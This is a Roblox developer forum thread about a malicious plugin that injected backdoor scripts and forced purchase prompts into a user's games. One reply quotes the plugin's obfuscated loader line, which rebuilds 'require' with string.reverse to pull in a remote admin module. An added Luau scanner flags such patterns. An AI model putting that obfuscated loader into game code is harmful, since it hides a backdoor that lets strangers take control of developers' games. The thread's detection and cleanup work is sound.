Fix for a mysterious prompt purchase EXPLOIT in my game

Try deleting both of those things since it will get rid of all of their children including the scripts if there are any located in there.

I remember reading somewhere that the NonReplicatedCSGDictionaryService is commonly used for malicious script injection but I’m not sure why it’s used for that, or how they get there without a) anyone having team create access or b) having any malicious plugins.

I would private message a Roblox admin about this and delete the 2 folders in the NonReplicatedCSGDictionaryService since this post is just going around in circles.

1 Like

I deleted them and nothing happened. I did message a Roblox staff member. I’m hoping they respond.
Also, any recommended staff members I should message?
Is there a number I can call?

You’re just going to have to wait for them to get back to you. I wouldn’t recommend going after any other staff members. I don’t believe Roblox has a number to call in general.

Is this happening for real? I hate to break it to you, but it must have been something on your end because of Filtering Enabled. Basically, changes on the client do not replicate, so if the hacker were to do this on his computer it would only affect him or her. So it must be either a plugin, Team Create, a model or some other malicious entity in Studio that exists.

I cannot give the best response right now, so I do apologize for that. I read everyone’s replies and it might be a plugin inserting the malware. What I would do to test that theory is create a new game and see if that appears on the other games too. If not, then it means that it does not have to do with any plugins. Contacting Roblox Staff was a good idea, and I hope they can resolve the problem.

This is the asset ID of the shirt: 3750950779, and I can’t find the asset ID in any of the scripts in the game :confused: But I’ll try your idea.

You know what, guys. You are right. It must be on my end. Though I don’t know what plugins or whatever are doing it.

I tried joining another game of mine and the same thing happened, so it’s a plugin.

Or… something.

I found it! The malicious plugin is this one:
https://www.roblox.com/library/3620029023/HD-Graphics-Fixed
I missed it earlier :confused:, I apologize for my mistake. This line is causing you issues:

getfenv()[string.reverse'eriuqer'](3610223581+2-1+1)

Uninstall this and then delete those items again.

Edit: Looking into it more, it looks like it’s requiring this: https://www.roblox.com/library/3610223583/Admin-Commands.

6 Likes

Thank you. You are my absolute Hero! ALL OF YOU WIN AN AWARD: MANELINS FAVORITE

That seems to not be the only scam I think. The creator of that plugin has re-uploaded many famous plugins (might be the original owner of the plugins, but I hardly think so). Here are the plugins:




Avoid adding any of these. I will check the scripts once I get home.

I remember nI2p now, he makes bad plugins and such, if you see anything created by him ignore it and stay away from it because it can totally destroy or mess up your game!

1 Like

Am I right the issue is solved? If yes, mark the right answer as the solution, then people won’t read everything to discover it’s fixed. :wink:

Kind Regards,
Jonas

There is a jump model that triggers a purchase after five minutes. You can also find the script by running a search for MarketplaceService.
Open a script in your game, that will open the script menu.
Then click on Find, Select Find All.
Search for MarketplaceService
That should show you every instance it is being used in your game.
You will probably find the malicious code nearby.
You can also run the search for the ID of the item being sold.

This should find most of the malicious use cases you have described.

Yeah nl2p is the one that made the furry shirt too

So does anyone have any suggestions to solve the exploitation? Any recommended places to look for anti-exploit scripts? Somehow people are exploiting in the main game… making Shreks appear everywhere, or making the whole server a dance party… even banning me from my own game, and making it so if I try to ban them it erases what I say. I have no idea how it gets through FE.

Well, you can’t “Get through FE”. You either have some poorly set up remote events that can handle commands or even run certain code. My guess is you probably have some hidden admin script somewhere which is allowing people to run commands/code. I suggest removing all of your plugins and then using the explorer “filter” tool to search for “script”. Using the Ctrl + F hotkey when inside a script to search for phrases like "require" can often help too. If there is any script that you did not write and/or don’t understand what is actually being run, then I’d recommend you delete it as well. Feel free to PM me if you want me to take a look; if you aren’t comfy with that then just reply here and I can try to help you further.

1 Like
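
A Find All for the literal word require does not match the line quoted earlier in the thread, because that line builds the name with string.reverse. The Luau sketch below is an added example, not part of any post here: it scans every script in the place for that trick, for MarketplaceService, and for numeric arguments that add up to an asset-sized ID. MIN_ASSET_ID, PATTERNS and the function names are assumptions of this example.

```lua
-- Added example, not from the thread. MIN_ASSET_ID and PATTERNS are assumptions.
local MIN_ASSET_ID = 1e6 -- ignore small numeric arguments such as wait(5)
local PATTERNS = {
	{ name = "getfenv lookup", pattern = "getfenv" },
	{ name = "string.reverse call", pattern = "string%.reverse" },
	{ name = "reversed 'require'", pattern = "eriuqer" },
	{ name = "require by number", pattern = "require%s*%(%s*%d" },
	{ name = "MarketplaceService", pattern = "MarketplaceService" },
}

-- Sum a "+"/"-" chain of integer literals, e.g. "3610223581+2-1+1".
local function evalSum(expr)
	local total, seen = 0, false
	for sign, digits in expr:gmatch("([%+%-]?)%s*(%d+)") do
		local n = tonumber(digits)
		total = total + (sign == "-" and -n or n)
		seen = true
	end
	return seen and total or nil
end

-- Return the list of reasons a script source looks suspicious.
local function scanSource(src)
	local hits = {}
	for _, p in ipairs(PATTERNS) do
		if src:find(p.pattern) then table.insert(hits, p.name) end
	end
	-- Parenthesised arguments made only of digits, spaces, "+" and "-".
	for expr in src:gmatch("%(%s*([%d%s%+%-]+)%)") do
		local id = evalSum(expr)
		if id and id >= MIN_ASSET_ID then
			table.insert(hits, ("numeric argument resolves to %.0f"):format(id))
		end
	end
	return hits
end

for _, inst in ipairs(game:GetDescendants()) do
	-- pcall guards against instances whose properties cannot be read here.
	local ok, src = pcall(function()
		return inst:IsA("LuaSourceContainer") and inst.Source
	end)
	if ok and type(src) == "string" then
		local hits = scanSource(src)
		if #hits > 0 then
			warn(inst:GetFullName() .. ": " .. table.concat(hits, "; "))
		end
	end
end
```

Run it from the Studio command bar, which has the access needed to read script Source. On the line quoted in the thread it reports the getfenv lookup, the string.reverse call, the reversed name, and a numeric argument resolving to 3610223583.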

Here’s the roundify I use since it has about 10k installs.

Anyways, have you removed your plugins that you don’t need yet?

1 Like

Yeah I’ve noticed that Roundify has been getting copied many times. I’ve been trying to get them taken down. Also, any malicious plugins you find, please do report them.

(I’ll be updating that post soon as I’ve got some new features planned, and 10K sales is outdated; it’s up to almost 35K.)

6 Likes